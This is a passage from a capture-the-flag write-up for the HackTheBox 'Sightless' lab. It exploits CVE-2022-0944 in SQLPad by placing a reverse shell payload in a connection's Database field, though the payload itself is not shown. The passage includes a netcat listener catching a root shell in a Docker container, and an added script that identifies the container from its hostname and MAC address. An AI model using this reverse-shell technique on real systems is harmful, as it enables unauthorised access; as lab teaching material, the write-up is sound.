CVE-2022-0944


The target SQLPad instance is vulnerable to [CVE-2022-0944](https://nvd.nist.gov/vuln/detail/CVE-2022-0944).

Adding a new connection

Creating a new connection, CVE-2022-0944, with a reverse shell payload in the Database field

```
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.206.178] 48384
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# whoami
whoami
root
root@c184118df0a6:/var/lib/sqlpad# hostname
hostname
c184118df0a6
root@c184118df0a6:/var/lib/sqlpad# ip a
ip a
bash: ip: command not found
root@c184118df0a6:/var/lib/sqlpad# ifconfig
ifconfig
bash: ifconfig: command not found
root@c184118df0a6:/var/lib/sqlpad# cat /sys/class/net/eth0/address
cat /sys/class/net/eth0/address
02:42:ac:11:00:02
```

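Initial foothold established in a Docker container, c184118df0a6, as the root user. The hostname has the form of a container ID, and the 02:42 MAC prefix on eth0 is the one Docker assigns on its bridge networks.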
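
The hostname and MAC address from the session above can be read mechanically. This is an added example, not part of the original notes; the function names are hypothetical, and it assumes the Docker engine derived the MAC from the container's IPv4 address (02:42 followed by the four address octets).

```sh
#!/bin/sh
# Added example: interpret the hostname and eth0 MAC seen in the session.
# Assumption: the engine builds the MAC as 02:42 + the four IPv4 octets.

# Print the IPv4 address encoded in a Docker-style MAC; return 1 otherwise.
docker_mac_to_ipv4() {
    dm_mac=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    # Exactly six colon-separated hex octets, starting with 02:42.
    printf '%s\n' "$dm_mac" | grep -Eq '^02:42(:[0-9a-f]{2}){4}$' || return 1
    # Split on ':' so that $3..$6 hold the address octets in hex.
    dm_ifs=$IFS; IFS=:
    set -- $dm_mac
    IFS=$dm_ifs
    printf '%d.%d.%d.%d\n' "0x$3" "0x$4" "0x$5" "0x$6"
}

# Succeed if the hostname is shaped like a truncated container ID
# (12 lowercase hex characters), Docker's default container hostname.
looks_like_container_id() {
    printf '%s\n' "$1" | grep -Eq '^[0-9a-f]{12}$'
}

# Combine both signals into a one-line verdict.
classify_host() {
    if ! looks_like_container_id "$1"; then
        echo "unknown"
    elif ch_ip=$(docker_mac_to_ipv4 "$2"); then
        echo "container ip=$ch_ip"
    else
        echo "possible-container"
    fi
}

# Values copied from the session on this page.
classify_host c184118df0a6 02:42:ac:11:00:02
```

A MAC that does not match the pattern only rules out the IP derivation; the hostname check alone still yields `possible-container`.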